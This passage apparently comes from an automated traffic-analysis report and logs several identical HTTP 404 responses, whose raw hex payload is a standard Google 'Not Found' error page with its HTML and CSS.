31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:00 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:04 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 